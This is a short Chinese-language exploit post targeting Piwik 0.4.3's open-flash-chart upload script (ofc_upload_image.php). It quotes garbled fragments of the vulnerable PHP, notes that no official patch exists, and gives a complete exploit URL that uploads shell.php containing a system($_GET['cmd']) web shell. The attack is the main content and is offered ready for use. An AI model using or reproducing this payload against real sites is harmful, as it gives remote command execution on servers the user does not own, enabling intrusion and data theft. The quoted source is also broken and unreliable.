测试通过的版本,本地测试成功: Piwik 0.4.3 目前官方还没给出补丁 |
分析代码: <?PHP /*检查是否存在$ default_path变量*/ /*如果属实,使具有写入权限的目录*/ /*然后,创建在与上面的文件名称的目录从形式输入“名称”*文件/ $destination = $default_path . basename( $_GET[ 'name' ] ); 保存您的图象: '. $destination; /*恶意代码在这里,并且攻击者能执行这个代码*/ |
Exp 利用程序: http://www.***.com/lazivip/libs/open-flash-chart/php-ofc-library/ofc_upload_image.php?name=shell.php&HTTP_RAW_POST_DATA=<?system($_GET['cmd']);?> |